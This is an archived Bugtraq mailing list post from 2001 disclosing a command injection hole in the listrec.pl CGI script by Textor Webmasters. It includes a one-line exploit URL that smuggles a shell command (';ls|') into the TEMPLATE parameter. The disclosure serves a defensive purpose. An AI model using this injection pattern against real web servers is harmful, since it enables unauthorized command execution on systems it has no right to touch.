Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Textor Webmasters Ltd (listrec.pl)

From: Alexey Sintsov <don_huan () xakep ru>
Date: 12 Sep 2001 04:01:24 -0000
Last update (of listrec.pl) Jon Wright 11/11/1998.

This script has vulnerability (does not filter input of the 
user) which allows to carry out commands from 
WebServer.

EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?
APP=qmh-news&TEMPLATE=;ls| 

XP-TEAM
Previous By Date Next
Previous By Thread Next

Current thread: